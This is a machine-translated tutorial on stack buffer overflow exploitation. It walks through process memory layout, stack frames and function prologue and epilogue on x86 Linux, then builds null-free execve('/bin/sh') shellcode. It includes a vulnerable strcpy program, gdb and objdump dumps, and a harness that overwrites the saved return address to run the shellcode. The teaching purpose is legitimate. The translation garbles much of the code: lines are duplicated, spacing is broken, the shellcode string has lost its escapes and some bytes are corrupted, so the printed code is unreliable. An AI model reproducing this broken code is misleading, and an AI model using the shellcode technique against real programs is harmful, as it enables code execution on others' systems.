Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode

Summary

This series covers the buffer overflow that occurs on the stack and the technique for exploiting this most common security error. The technique of exploiting buffer overflow exploit is considered one of the most classic hacking techniques. The article is divided into 2 parts:

Part 1: Organize memory, stack, call functions, shellcode. Introducing the memory organization of a process, stack memory operations when calling the basic function and technique to create shellcode - the code executes a command-line interface (shell).

Part 2: Techniques for exploiting buffer overflow errors. Introducing the basic buffer overflow technique, shellcode organization, determining the return address, shellcode address, and how to transfer shellcode to the program.

The technical details illustrated here are implemented on Linux x86 environment (kernel 2.2.20, glibc-2.1.3), but theoretically can be applied to any other environment. Readers need basic knowledge of C programming, assembly, gcc compiler and gdb debugger (GNU Debugger).

If you already know the techniques to exploit buffer overflows through other documents, this article can also help you consolidate your knowledge more firmly.

Introduce

To learn more about buffer overflows, operation mechanisms, and how to exploit errors, start with an example of a buffer overflow program.

 / * vuln.c * / int main (int argc, char ** argv) {char buf [16]; if (argc]1) { strcpy(buf, argv[1]); if (argc] 1) {strcpy (buf, argv [1]); printf("%sn", buf); printf ("% sn", buf); } } [SkZ0@gamma bof]$ gcc -o vuln -g vuln.c [SkZ0@gamma bof]$ ./vuln AAAAAAAA // 8 ký tự A (1) AAAAAAAA [SkZ0@gamma bof]$ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA // 24 ký tự A (2) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault (core dumped) }} [SkZ0 @ gamma bof] $ gcc -o vuln -g vuln.c [SkZ0 @ gamma bof] $ ./vuln AAAAAAAA // 8 characters A (1) AAAAAAAA [SkZ0 @ gamma bof] $ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA // 24 characters A (2) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault (core dumped)

Run the vuln program with a parameter of 8 characters long A (1), the program works normally. With the parameter is a string of 24 characters A (2), the program has a Segmentation fault . It is easy to see that the buf buffer in the program can only contain up to 16 characters that have been overflowed by 24 characters A.

 [SkZ0 @ gamma bof] $ gdb vuln -c core -q Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA '. Program terminated với tín hiệu 11, Segmentation fault. Reading symbols from /lib/libc.so.6.done. Reading symbols from /lib/ld-linux.so.2.done. # 0 0x41414141 in ?? () (gdb) info register eip eip 0x41414141 1094795585 (gdb)

The eip register - the current command pointer - has a value of 0x41414141 , equivalent to 'AAAA' (A character has a value of 0x41 hexa). We see, it is possible to change the value of the eip command cursor register by overflowing the buf buffer. When a buffer overflow has occurred, we can make the program execute the code arbitrarily by changing the eip command pointer to the starting address of the code.

To understand how the buffer overflow occurs, we will look at the details of a program's memory, stack, and function invocation.

1. Organize memory

1.1 Organizing memory of a process

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 1

Each execution process is granted by the operating system to a similar (logical) virtual memory space. This memory space consists of 3 areas: text , data and stack . The meaning of these 3 regions is as follows:

text area is a fixed area, contains executable code (instruction) and read-only data (read-only). This area is shared between the execution process of the same program file and corresponding to the text of the executable file. The data in this area is read-only, all operations to write to this memory area cause segmentation violation .

The data area contains data that has been initialized or has not been initialized. Global and static variables are contained in this area. The data area corresponds to the data-bss segment of the executable file.

The stack area is the reserved memory area when executing the program used to contain the value of the local variables of the function, the parameter to call the function as well as the return value. Working on stack memory is handled by the "first-in-first out" mechanism - LIFO (Last In, First Out) with two most important commands, PUSH and POP. Within the scope of this article, we only focus on understanding the stack area.

1.2 Stack

Stack is a high-level abstract data structure used for special LIFO operations.

The organization of the stack area includes stack frame are push when calling a function and pop off the stack when returning. A stack frame contains the necessary parameters for a function: local variable, function parameter, return value; and the data needed to restore the previous stack frame, including the value of the instruction pointer at the time of calling the function.

The bottom of the stack is assigned a fixed value. The top of the stack is stored by the "stack pointer" ( ESP - extended stack pointer ). Depending on the reality, the stack may develop in the direction of memory address from high to low or from low to high. In the following examples, we use the memory address stack to grow from high to low, this is the reality of Intel architecture. The stack pointer (SP) also depends on the actual architecture. It can point to the last address on the stack top or the next blank memory address on the stack. In the following illustrations (with Intel x86 architecture), SP points to the last address on the top of the stack.

In theory, local variables on a stack frame can be accessed based on offset compared to SP. However, when adding or removing operations on the stack, these displacements need to be recalculated, reducing efficiency. To increase efficiency, compilers use a second register called the " base pointer " ( EBP - extended base pointer ) or " FP " frame pointer . FP points to a fixed value on a stack frame, usually the first value of the stack frame, local variables and parameters are accessed via displacement relative to the FP and therefore are not changed by operations. add / remove next on stack.

The basic storage unit on the stack is word, valued at 32 bits (4 bytes) on Intel x86 CPUs. (On Alpha CPUs or Sparc this value is 64 bits). All variable values allocated on the stack are sized in multiples of word.

Operation on the stack is done by 2 machine commands:

push value : put the value 'value' at the top of the stack. Reduce the value of %esp to 1 word and set the value 'value' to that word.
pop dest : takes the value from the stack top to put 'dest'. Set the value pointed by %esp to 'dest' and increase the value of %esp to 1 word.

2. The function and call the function

2.1 Introduction

To explain the program's operation when calling the function, we will use the following example program:

 / * fct.c * / void toto (int i, int j) {char str [5] = "abcde"; int k = 3; int k = 3; j = 0; j = 0; return; return; } int main(int argc, char **argv) { int i = 1; } int main (int argc, char ** argv) {int i = 1; toto(1, 2); toto (1, 2); i = 0; i = 0; printf("i=%dn",i); printf ("i =% dn", i); } }

The calling process can be divided into 3 steps:

Prolog: Before moving to execute a function, prepare some tasks such as saving the current state of the stack, allocating the memory needed to execute.
Call the function (call): when the function is called, the parameters are placed on the stack and the IP instruction instruction is saved to allow the execution process to be transferred to the right point after calling the function.
Finish (epilog): restore the state as before calling the function.

2.2. Start

A function is always started with the following machine commands:

 push% ebp mov% esp,% ebp sub $ 0xNN,% esp // (0xNN value depends on each specific function)

These three instructions are called the prolog of the function. The following figure explains the start of the toto() function and the values of %esp , %ebp .

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 2

Suppose initially %ebp points to any X address on memory, %esp points to a lower Y address below. Before moving into a function, it is necessary to save the current stack frame environment, since all values on a stack frame can be referenced through %ebp , we only need to save %ebp . Since %ebp is push on the stack, %esp will decrease by 1 word. The value of %ebp push into this stack is called a " saved frame pointer " ( SFP ).

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 3

The second machine command will set up a new environment by setting %ebp to the top of the stack (the first value of a stack frame), now %ebp and %esp will point to the same location as the address (Y-1word).

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 4

The third machine command allocates memory for local variables. The character array is 5 bytes long, but the stack uses the storage unit of word, so the memory allocated to the character array will be a multiple of the word so that it is greater than or equal to the size of the array. Easy to see that value is 8 bytes (2 words). The variable k integer type is 4 bytes in size, so the device size for local variables will be 8 + 4 = 12 bytes (3 words), allocated by reducing% esp to a value of 0xc (equal to 12 in base number 16).

One thing to note here is that local variables always have negative displacement compared to pointers in the background %ebp . The machine command that performs assignment i = 0 in main () can illustrate this. The assembly code uses indirect positioning to determine the location of i:

 movl $ 0x0,0xfffffffc (% ebp)

0xfffffffc is equivalent to an integer value of –4. The above command means: set the value 0 to the variable at the address of displacement '-4' byte compared to the %ebp . i is the first variable in main () function and has address 4 bytes right below %ebp .

2.3. Call the function

Like the initial step, this step also prepares an environment that allows the function call to pass parameters to the called function and returns to the place where the function is called when it ends.

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 5

Before calling the function the parameters will be placed on the stack, in reverse order, the last parameter will be placed first. In the above example, first values 1 and 2 will be placed on the stack. The %eip holds the address value of the next instruction, in this case the function instruction.

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 6

When executing the call command, %eip will take the address value of the next immediately after calling the function (in the figure, this value is Z + 5 because the function call takes up 5 bytes according to the implementation of the Intel x86 CPU). The call command will then save the value of %eip so that it can continue executing after returning. This process is performed by an implicit (implicit) command that places %eip on the stack:

 push% eip

The value stored on this stack is called the "save command pointer" ( SIP - save instruction pointer ), or " return address " ( RET - return address ).

The value passed as a parameter to the call command is the address of the first prolog command of the toto() function. This value will be copied to %eip and become the next executed command.

Note that when inside a function, the parameters and return address have positive displacement (+) compared to the pointer in the background %ebp . The machine command that performs the assignment j = 0 illustrates this. Assembly language using indirect positioning to retrieve variable j:

 movl $ 0x0,0xc (% ebp)

0xc has an integer value of 12. The above command means: set the value 0 to the variable at the address of displacement '+12' bytes compared to %ebp . j is the second parameter of the toto () function and has the address separated from 12 bytes immediately on %ebp (4 for RET, 4 for the first parameter and 4 for the second parameter).

2.4. Finish

Exiting a function is done in 2 steps. First, the environment created for the executable function needs to be "cleaned up" (ie restoring values to %ebp and %eip ). Then, we have to check the stack to get the information related to the exit function.

The first step is executed inside the function with 2 commands:

 leave ret

The next step is done where the function call will "clean up" the stack area used to contain the parameters of the called function.

We will continue the above example with the function toto() .

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 7

Here we describe more fully the initial situation, before the call and the prolog. Before the call command occurs, %ebp in the X and %esp addresses at the Y address on the stack. Starting from Y, we will allocate memory areas for parameters, reserved values of %eip and %ebp , and devices for local variables of the function. The next command is to leave , this command is equivalent to the following two commands:

 mov% ebp,% esp pop% ebp

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 8

The first command will put %esp and %ebp pointing to the same current location of %ebp . The second command retrieves the value on the top of the stack and places it in the %ebp . We see, after the leave command, the stack returns to the same state as before the prolog.

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 9

The ret command will restore the %eip value to where the function call returns to continue executing the next command, the command immediately after the function has just exited. To do this, the value immediately above the top of the stack will be removed and placed in the %eip .

We have not yet returned to the original state because the parameters passed to the function have not yet been removed from the stack. They will be deleted in the next command at the address Z + 5 stored in %eip .

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 10

The allocation and recovery of the stack of function parameters is done where the function is called. This is illustrated in the figure with the command:

 add 0x8,% esp

This command will move %esp from the stack top with the number of bytes equal to the number of bytes allocated to the parameters of the toto() function. The %ebp and %esp are now the same as the status before the call occurred. However, the value of %eip has been moved to the next command.

Compile and decompress the illustrated program language with gdb to see the assembly language code corresponding to the steps presented.

 [SkZ0 @ gamma bof] $ gcc -g -o fct fct.c [SkZ0 @ gamma bof] $ gdb fct -q (gdb) disassemble main // main Dump function of assembler code for function main: 0x80483e0: push% ebp / / initial step - prolog 0x80483e1 [main+1] : mov% esp,% ebp 0x80483e3 [main+3] : sub $ 0x4,% esp 0x80483e6 [main+6] : movl $ 0x1,0xfffffffc (% ebp) 0x80483ed [main+13] : push $ 0x2 // call function - call 0x80483ef [main+15] : push $ 0x1 0x80483f1 [main+17] : call 0x80483b4 0x80483f6 [main+22] : add $ 0x8,% esp // return from the function toto () 0x80483f9 [main+25] : movl $ 0x0,0xfffffffc (% ebp) 0x8048400 [main+32] : mov 0xfffffffc (% ebp),% eax 0x8048403 [main+35] : push% eax // call function - call 0x8048404 [main+36] : push $ 0x804846e 0x8048409 [main+41] : call 0x8048308 0x804840e [main+46] : add $ 0x8,% esp // return from the printf () function 0x8048411 [main+49] : leave // return from main () function 0x8048412 [main+50] : ret 0x8048413 [main+51] : nop End of assembler dump. (gdb) disassemble toto // function toto Dump of assembler code for function toto: 0x80483b4: push% ebp // initial step - prolog 0x80483b5 [toto+1] : mov% esp,% ebp 0x80483b7 [toto+3] : sub $ 0xc,% esp 0x80483ba [toto+6] : mov 0x8048468,% eax 0x80483bf [toto+11] : mov% eax, 0xfffffff8 (% ebp) 0x80483c2 [toto+14] : mov 0x804846c,% al 0x80483c8 [toto+20] : mov% al, 0xfffffffc (% ebp) 0x80483cb [toto+23] : movl $ 0x3,0xfffffff4 (% ebp) 0x80483d2 [toto+30] : movl $ 0x0,0xc (% ebp) 0x80483d9 [toto+37] : jmp 0x80483dc [toto+40] 0x80483db [toto+39] : nop 0x80483dc [toto+40] : leave // return from the function toto () 0x80483dd [toto+41] : ret 0x80483de [toto+42] : mov% esi,% esi End of assembler dump. (gdb)

3. Shellcode

When buffer overflow occurs, we can manipulate the stack, override the return value of RET and cause the program to execute any code. The simplest and simplest way is to make the program execute a code to run a shell command line interface. Because it will be directly inserted into the middle of the program memory to execute, this code must be written in assembly language. The code of this type is often called shellcode.

3.1. Write shellcode in C language

The purpose of shellcode is to execute a shell command line interface. First write in C language:

 / * shellcode.c * / #include #include int main () {char * name [] = {"/ bin / sh", NULL}; execve (name [0], name, NULL); _exit (0); }

Among the exec() functions used to invoke another program, execve() is the recommended function. The reason: execve() is a system-call (different from other exec() functions implemented in libc (and thus implemented based on execve() ). The system function is performed via interrupt call with parameter values placed in the predetermined register, so the generated assembly code will be brief.

Furthermore, if the call execve() successful, the calling program will be replaced by the called program and considered as the beginning of the execution process. If call execve() fails, the calling program will continue the execution process. When exploiting a vulnerability, the shellcode code will be inserted in the middle of the execution of the faulty program. After running the code at will, continuing the execution of the program is unnecessary and sometimes causes unintended results because the contents of the stack have been changed. Therefore, the enforcement process should be finished as soon as possible. Here we use _exit() to finish instead of using exit() as the libc library function is implemented based on the system function _exit() .

Remember the parameters to pass the execve() function on:

string /bin/sh
address of parameter array (ending with NULL pointer)
address of array environment variable (here is NULL pointer)

3.2. Decode assembly language functions

Compiling shellcode.c with debug and static options to integrate linked library functions into the program.

 [SkZ0 @ gamma bof] $ gcc -o shellcode shellcode.c -O2 -g --static

Now consider the assembly code of main() function with gdb .

 [SkZ0 @ gamma bof] $ gdb shellcode -q (gdb) disassemble main Dump of assembler code for function main: 0x804818c: push% ebp 0x804818d [main+1] : mov% esp,% ebp 0x804818f [main+3] : sub $ 0x8,% esp 0x8048192 [main+6] : movl $ 0x0,0xfffffff8 (% ebp) 0x8048199 [main+13] : movl $ 0x0,0xfffffffc (% ebp) 0x80481a0 [main+20] : mov $ 0x806f388,% edx 0x80481a5 [main+25] : mov% edx, 0xfffffff8 (% ebp) 0x80481a8 [main+28] : push $ 0x0 0x80481aa [main+30] : lea 0xfffffff8 (% ebp),% eax 0x80481ad [main+33] : push% eax 0x80481ae [main+34] : push% edx 0x80481af [main+35] : call 0x804c6ec 0x80481b4 [main+40] : push $ 0x0 0x80481b6 [main+42] : call 0x804c6d0 End of assembler dump. (gdb)

Notice the following command:

 0x80481a0 [main+20] : mov $ 0x806f388,% edx

This command converts an address value into the %edx .

 (gdb) printf "% sn", 0x806f388 / bin / sh (gdb)

So the "/bin/sh" string address will be placed in %edx . Before calling the lower functions of the C library implement the execve() system function parameters are put into the stack in order:

NULL pointer

 0x80481a8 [main+28] : push $0x0

address of parameter array

 0x80481aa : lea 0xfffffff8(%ebp),%eax [main+30] 0x80481aa : lea 0xfffffff8(%ebp),%eax 
 0x80481ad : push %eax [main+33] 0x80481ad : push %eax

address of string /bin/sh

 0x80481ae : push %edx [main+34] 0x80481ae : push %edx

See the execve() and _exit()

 (gdb) disassemble __execve Dump of assembler code for function __execve: 0x804c6ec: push% ebp 0x804c6ed : mov% esp,% ebp 0x804c6ef : push% edi 0x804c6f0 : push% ebx 0x804c6f1 : mov 0x8 (% ebp),% edi 0x804c6f4 : mov $ 0x0,% eax 0x804c6f9 : test% eax,% eax 0x804c6fb : je 0x804c702 0x804c6fd : call 0x0 0x804c702 : mov 0xc (% ebp),% ecx 0x804c705 : mov 0x10 (% ebp),% edx 0x804c708 [ __execve + 28]:% ebx push 0x804c709 : mov% edi,% ebx 0x804c70b : mov $ 0xb,% eax 0x804c710 : int $ 0x80 0x804c712 : pop% ebx 0x804c713 : mov% eax,% ebx 0x804c715 : cmp $ 0xfffff000,% ebx 0x804c71b : jbe 0x804c72b 0x804c71d : call 0x80482b8 0x804c722 : neg% ebx 0x804c724 : mov% ebx, (% eax) 0x804c726 : mov $ 0xffffffff,% ebx 0x804c72b ]: mov% ebx,% eax 0x804c72d : lea 0xfffffff8 (% ebp),% esp 0x804c730 : pop% ebx 0x804c731 : pop% edi 0x804c732 : leave 0x804c733 : ret End of assembler dump. (gdb) disassemble _exit Dump of assembler code for function _exit: 0x804c6d0: mov% ebx,% edx 0x804c6d2 : mov 0x4 (% esp, 1),% ebx 0x804c6d6 : mov $ 0x1, % eax 0x804c6db : int $ 0x80 0x804c6dd : mov% edx,% ebx 0x804c6df : cmp $ 0xfffff001,% eax 0x804c6e4 : jae 0x804ca80 End of assembler dump. (gdb) quit

The operating system will execute a call by calling 0x80 interrupt, at 0x804c710 for execve() and 0x804c6db for _exit() . These addresses are often not the same for each system function, the distinguishing feature is the register content %eax . See above, this value is 0xb with execve() while _exit() is 0x1 .

Techniques to exploit buffer overflows: Organize memory, stack, call functions, shellcode Picture 11
Figure 4: execve function and parameter

Analyzing the above assembly language code, we draw the following conclusions:

before calling to execute __execve() function with interrupt call 0x80 :
1. %edx holds the address value of the environment variable array:
```
 0x804c705 [__execve+25]: mov 0x10(%ebp),%edx 
```
  For simplicity, we will use an empty environment variable by assigning this value with a NULL pointer.
2. %ecx holds the address value of the parameter array0x804c702 [__execve+22]: mov 0xc(%ebp),%ecxThe first parameter must be the name of the program, here simply an array to contain the address of the string "/bin/sh" and end with a NULL pointer.
3. %ebx holds the address of the program name string to execute, in this case "/bin/sh"
```
 0x804c6f1 [__execve+5]: mov 0x8(%ebp),%edi 
 . 
 0x804c709 [__execve+29]: mov %edi,%ebx 
```
_exit () function: ending the execution process, the resulting code returned to the parent process (usually a shell) is stored in the %ebx0x804c6d2 [_exit+2]: mov 0x4(%esp,1),%ebx

To finish creating assembly language code, we need a place containing the string "/bin/sh" , a pointer to this string and a NULL pointer (to terminate the parameter array, and also an environment variable pointer). ). The above data must be prepared before implementing execve() .

3.3. Locate shellcode on memory

Usually shellcode will be inserted into the faulty program via command line parameters, environment variables or keyboard input / file strings. Either way, when creating shellcode, we cannot know its address. Not only that, we also have to know the string "/bin/sh" advance. However, with some tricks we can solve that problem. There are two ways to locate shellcode on memory, all via indirect positioning to ensure independence. For simplicity, here we will show how to locate shellcode using the stack.

To prepare the parameter array and the environment variable pointer for the execve() function, we will place the string "/bin/sh" , the NULL pointer on the stack and specify the address via %esp register value %esp . Assembly language code will have the following form:

 beginning_of_shellcode: pushl $ 0x0 // null value ends / bin / sh pushl "/ bin / sh" // string / bin / sh movl% esp,% ebx //% ebx contains / bin / sh push NULL // NULL pointer of parameter array . (assembly code of shellcode)

3.4. Problem byte value null

Error functions are usually string handling functions like strcpy() , scanf() . To insert code in the middle of the program, shellcode must be copied as a string. However, the string handler functions will complete once a null character is encountered ( ). Therefore, our shellcode must not contain any null values. We will use some tricks to remove null values, for example:

 push $ 0x00

The equivalent will be replaced by:

 xorl% eax,% eax push% eax

That's how to handle null bytes directly. The null value also arises when converting the code to hexa. For example, the command turns the 0x1 value into %eax to call _exit() :

 0x804c6d6 : mov $ 0x1,% eax

Converting to hexadecimal will become a string:

 b8 01 00 00 00 mov $ 0x1,% eax

The trick to use is to initialize the value to %eax with a register of value 0, then increase it to 1 (or use the movb command to operate on a low byte of %eax )

 31 c0 xor% eax,% eax 40 inc% eax

3.5. Create shellcode

We already have all that is needed to create shellcode. Program to create shellcode:

 / * shellcode_asm.c * / int main () {asm ("/ * push null value ends / bin / sh on stack * / xorl% eax,% eax pushl% eax / * push string / bin / sh on stack * / pushl $ 0x68732f2f / * string // sh, length 1 word * / pushl $ 0x6e69622f / * string / bin * / / *% ebx contains / bin / sh * / movl% string address,% ebx / * push pointer NULL, second element of parameter array * / pushl% eax / * push address of / bin / sh, second element of parameter array * / pushl% ebx / *% ecx contains array address parameter * / movl% esp,% ecx / *% edx contains the array address of the environment variable, the pointer NULL * / / * can use the equivalent cdq command, 1 byte shorter * / movl% eax,% edx / * Execve () function:% eax = 0xb * / movb $ 0xb,% al / * Call function * / int $ 0x80 / * Value returned 0 for _exit () * / xorl% ebx,% ebx / * Function _exit ():% eax = 0x1 * / movl% ebx,% eax inc% eax / * Calling the function * / int $ 0x80 "); } }

Above shellcode translation and dump in assembly language:

 [SkZ0 @ gamma bof] $ gcc -o shellcode_asm shellcode_asm.c [SkZ0 @ gamma bof] $ objdump -d shellcode_asm | grep: -A 17 08048380: 8048380: 55 pushl% ebp 8048381: 89 e5 movl% esp,% ebp 8048383: 31 c0 xorl% eax,% eax 8048385: 50 pushl% eax 8048386: 68 2f 2f 73 68 pushl $ 0x68732f2f 804838b : 68 2f 62 69 6l pushl $ 0x6e69622f 8048390: 89 movl% e3 esp,% ebx 8048392: 50 pushl% eax 8048393: 53 pushl% ebx 8048394: 89 movl% e1 esp,% ecx 8048396: 89 c2 movl% eax,% edx 8048398: b0 0b movb $ 0xb,% al 804839a: cd 80 int $ 0x80 804839c: 31 db xorl% ebx,% ebx 804839e: 31 c0 xorl% eax,% eax 80483a0: 40 incl% eax 80483a1: cd 80 int $ 0 x80

Test shellcode on:

 / * testsc.c * / char shellcode [] = "x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50" "x53x89xe1x89xc2xb0x0bxcdx80x31xbx31xc0x40xcdx80"; int main () {int * ret; /* ghi đè giá trị bảo lưu %eip trên stack bằng địa chỉ shellcode */ /* khoảng cách so với biến ret là 8 byte (2 word): */ /* - 4 byte cho biến ret */ /* - 4 byte cho giá trị bảo lưu %ebp */ * ((int *) & ret + 2) = (int) shellcode; / * override the value of saving% eip on the stack with shellcode * / / * address distance from ret variable is 8 bytes (2 word): * / / * - 4 bytes for ret * / / * variable - 4 byte for reservation value% ebp * / * ((int *) & ret + 2) = (int) shellcode; return (0); return (0); } }

Test the testsc program:

 [SkZ0 @ gamma bof] $ gcc testsc.c -o testsc [SkZ0 @ gamma bof] $ ./testsc bash $ exit [SkZ0 @ gamma bof] $

We can add functions to extend the functionality of shellcode, perform other necessary operations before calling "/bin/sh" such as setuid() , setgid() , chroot() , . by insert the assembly code of these functions before the above shellcode segment.

As can be seen in the shellcode test example, the basic idea to exploit the buffer overflow, details will be presented in the next section.

Marvin Fry

Update 26 May 2019

You should read it

May be interested

Useful tips for organizing bookmarks in the browser
what is the best way to store and organize bookmarks? here are some creative ways to do this, depending on the usage and browser you are using.
How to Implement a Stack Data Structure in C++
a stack is a basic data structure that is commonly used throughout computer science. for example, a stack is utilized by your web browser to remember the last few pages you were on. developers and programmers should be very familiar with...
Computer says waiting for buffer memory, how to fix it?
it's not uncommon for a computer to say it's waiting for a cache. however, many users still do not know how to handle it.
Linux kernel vulnerability exposes Stack memory, causing local data leak
the way the researcher tells an international has just disclosed information about a relatively serious vulnerability that exists in the linux kernel, which can be exploited to leak data and act as a bridge. effective coupling for deeper penetration into victim systems.
How to Become a Full Stack Programmer
a full-stack programmer is a versatile developer who has experience and understanding of front-end and back-end software and hardware. full-stack developers also have a firm grasp of a multitude of programming languages, making them agile...
PHP functions
php functions are similar to other programming languages. a function is a piece of code that takes one or more inputs in the parameter template, and performs some processing and returns a value.
How to Create and Call PHP Functions
perhaps you have learned the basics of writing php scripts. but sometimes your code may be long and repetitive. php functions are a flexible and easy way to consolidate code. this tutorial will you teach the basics of php functions. (note:...
How to manage memory to restrict Linux to use too much RAM
you install linux with the promise that it will consume less system resources than windows. but why then, is your system still slow?
Memory management in C
this chapter explains how to manage dynamic memory in c language. programming language c provides several different functions for allocating and managing memory.
Shell functions
functions allow you to streamline an overall feature of a script into a smaller and more logical part that can perform the same function whenever it is needed through the function call.